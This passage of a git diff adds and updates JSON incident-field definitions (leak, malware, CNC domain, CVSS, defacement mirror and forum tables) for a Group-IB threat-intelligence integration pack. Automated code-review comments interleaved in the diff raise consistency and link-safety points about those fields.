\ No newline at end of file
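Review bot: Dropping `"marketplaces": ["xsoar"]` from GIB Inject MD5 is a behaviour change beyond the metadata refresh the rest of this hunk performs: with the key absent the field is presumably offered on every marketplace instead of XSOAR only. The same removal is made to GIB Leaked File Name further down, so if lifting the restriction is intended it belongs in the release notes; if the key was merely lost on re-export, it should be restored rather than silently widened. I cannot tell which from the diff alone.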
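Review bot: `"type": "tagsSelect"` on GIB Is Tailored sits oddly with the field's yes/no name and with GIB Has Exploit, which this same patch defines as `"type": "boolean"`. If the upstream value is a boolean, `"type": "boolean"` keeps the two consistent and makes the field filterable as a flag; if it really is a list of tags, a less boolean-sounding name would avoid misleading analysts. The mapper is not in this hunk, so confirm which shape the value actually has before choosing.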
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Name.json index c1e94d11f2cb..820868965af9 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Name.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Name.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Published.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Published.json new file mode 100644 index 000000000000..d2f957d07a34 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Published.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Data Breach" + ], + "caseInsensitive": true, + "cliName": "gibleakpublished", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibleakpublished", + "isReadOnly": false, + "locked": false, + "name": "GIB Leak Published", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_Data.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_Data.json
index eaf9c5313735..a089ff1a4890 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_Data.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_Data.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Public Leak"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_File_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_File_Name.json
index 704c55b7b623..d92d8af97fe5 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_File_Name.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leaked_File_Name.json
@@ -26,7 +26,9 @@
 "useAsKpi": false,
 "version": -1,
 "fromVersion": "6.0.0",
- "marketplaces": [
- "xsoar"
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Git Leak"
 ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Link_List_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Link_List_Table.json
new file mode 100644
index 000000000000..a8084ec7f080
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Link_List_Table.json
@@ -0,0 +1,132 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Public Leak" + ], + "caseInsensitive": true, + "cliName": "giblinklisttable", + "closeForm": true, + "columns": [ + { + "displayName": "Author", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "author", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Hash", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "hash", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Link", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "link", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + }, + { + "displayName": "Title", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "title", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Source", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "source", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Date Detected", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datedetected", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "Date Published", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datepublished", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + 
"group": 0, + "hidden": false, + "id": "incident_giblinklisttable", + "isReadOnly": false, + "locked": false, + "name": "GIB Link List Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Public Leak" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Aliases.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Aliases.json new file mode 100644 index 000000000000..1c151b444968 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Aliases.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibmalwarealiases", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwarealiases", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware Aliases", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_CNC_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_CNC_Domain.json new file mode 100644 index 000000000000..3d7afbca5376 --- /dev/null 
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_CNC_Domain.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware CNC" + ], + "caseInsensitive": true, + "cliName": "gibmalwarecncdomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibmalwarecncdomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Malware CNC Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware CNC" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Categories.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Categories.json new file mode 100644 index 000000000000..3a8f59d9b3fe --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Categories.json 
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Malware"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmalwarecategories",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmalwarecategories",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Malware Categories",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Malware"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Description.json
new file mode 100644
index 000000000000..56402bac8ce3
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Description.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Malware"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmalwaredescription",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmalwaredescription",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Malware Description",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Malware"
+ ],
+ "threshold": 72,
+ "type": "longText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_File_hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_File_hash.json
new file mode 100644
index 000000000000..5bb708bf07f3
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_File_hash.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Malware"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmalwarefilehash",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmalwarefilehash",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Malware File hash",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Malware"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Langs.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Langs.json
new file mode 100644
index 000000000000..cf7979ff37fd
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Langs.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Malware"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmalwarelangs",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmalwarelangs",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Malware Langs",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Malware"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Name.json
index 828e7520d565..d827de03f46e 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Name.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Name.json
@@ -3,7 +3,9 @@
 "associatedTypes": [
 "GIB Compromised Account",
 "GIB Compromised Card",
- "GIB Targeted Malware"
+ "GIB Targeted Malware",
+ "GIB Attacks DDOS",
+ "GIB Malware"
 ],
 "caseInsensitive": false,
 "cliName": "gibmalwarename",
@@ -27,5 +29,14 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Account",
+ "GIB Compromised Card",
+ "GIB Targeted Malware",
+ "GIB Attacks DDOS",
+ "GIB Malware"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Platforms.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Platforms.json
new file mode 100644
index 000000000000..b7d6f3fbb677
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Platforms.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Malware"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmalwareplatforms",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmalwareplatforms",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Malware Platforms",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Malware"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Regions.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Regions.json
new file mode 100644
index 000000000000..95d5bd31df42
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Regions.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Malware"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmalwareregions",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmalwareregions",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Malware Regions",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Malware"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Short_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Short_Description.json
new file mode 100644
index 000000000000..380b56b0aa16
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Short_Description.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Malware"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmalwareshortdescription",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmalwareshortdescription",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Malware Short Description",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Malware"
+ ],
+ "threshold": 72,
+ "type": "longText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Source_Countries.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Source_Countries.json
new file mode 100644
index 000000000000..ba7679ab375d
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Source_Countries.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Malware"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmalwaresourcecountries",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmalwaresourcecountries",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Malware Source Countries",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Malware"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Table.json
new file mode 100644
index 000000000000..6bf2b1beb94a
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Table.json
@@ -0,0 +1,67 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Compromised Card Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmalwaretable",
+ "closeForm": true,
+ "columns": [
+ {
+ "displayName": "ID",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "id",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ },
+ {
+ "displayName": "Name",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "name",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ }
+ ],
+ "content": true,
+ "defaultRows": [
+ {}
+ ],
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmalwaretable",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB Malware Table",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Card Group"
+ ],
+ "threshold": 72,
+ "type": "grid",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Matches_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Matches_Table.json
new file mode 100644
index 000000000000..5bdfb36b28cb
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Matches_Table.json
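Review bot: `GIB Malware Table` is associated only with `"GIB Compromised Card Group"` while every other `GIB Malware *` field in this commit is associated with `"GIB Malware"`; if the table is intended for the card-group incident type that is fine, but the name suggests otherwise, so a one-line rationale in the PR or a more specific field name would avoid the question later. This grid field also omits the `"itemVersion": "1.4.2"` entry that the non-grid fields and the `GIB Matches Table` in the next hunk carry, and the same omission is in the nation-state forums table and reports table further down. If grid fields deliberately do not carry it this is harmless; otherwise add `"itemVersion": "1.4.2",` after `"isReadOnly": false,` for consistency.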
@@ -0,0 +1,81 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB OSI Public Leak"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmatchestable",
+ "closeForm": true,
+ "columns": [
+ {
+ "displayName": "Type",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "type",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ },
+ {
+ "displayName": "Sub Type",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "subtype",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ },
+ {
+ "displayName": "Value",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "value",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ }
+ ],
+ "content": true,
+ "defaultRows": [
+ {}
+ ],
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmatchestable",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Matches Table",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Public Leak"
+ ],
+ "threshold": 72,
+ "type": "grid",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Merged_Cvss.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Merged_Cvss.json
new file mode 100644
index 000000000000..2dea8a43d45b
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Merged_Cvss.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmergedcvss",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmergedcvss",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Merged Cvss",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "threshold": 72,
+ "type": "number",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Mirror_Link.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Mirror_Link.json
new file mode 100644
index 000000000000..3bf53f4e26db
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Mirror_Link.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibmirrorlink",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibmirrorlink",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Mirror Link",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "threshold": 72,
+ "type": "url",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
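Review bot: `"type": "url"` on `GIB Mirror Link` stores a link to a defacement mirror, i.e. content that is attacker-influenced, and a `url`-typed field is presumably rendered as a clickable link in the incident layout; the same applies to the `"type": "url"` column keyed `url` in the nation-state forums table later in this diff. Consider `shortText` for these so analysts copy the value rather than click it, or document on the field that the value is untrusted third-party intelligence and should be opened only in an isolated browsing environment. The `GIB Malware CNC Domain` field added in this same commit already uses `shortText`, which is the safer choice for indicator-like values.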
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Name_Servers.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Name_Servers.json
index 015e54309fb6..de86e28b7137 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Name_Servers.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Name_Servers.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Domain"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json
new file mode 100644
index 000000000000..6c3a061ed6a9
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json
@@ -0,0 +1,67 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Nation-State Cybercriminals Threat"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibnationstatecybercriminalforumstable",
+ "closeForm": true,
+ "columns": [
+ {
+ "displayName": "Nickname",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "nickname",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 302
+ },
+ {
+ "displayName": "URL",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "url",
+ "orgType": "url",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "url",
+ "width": 150
+ }
+ ],
+ "content": true,
+ "defaultRows": [
+ {}
+ ],
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibnationstatecybercriminalforumstable",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminal Forums Table",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
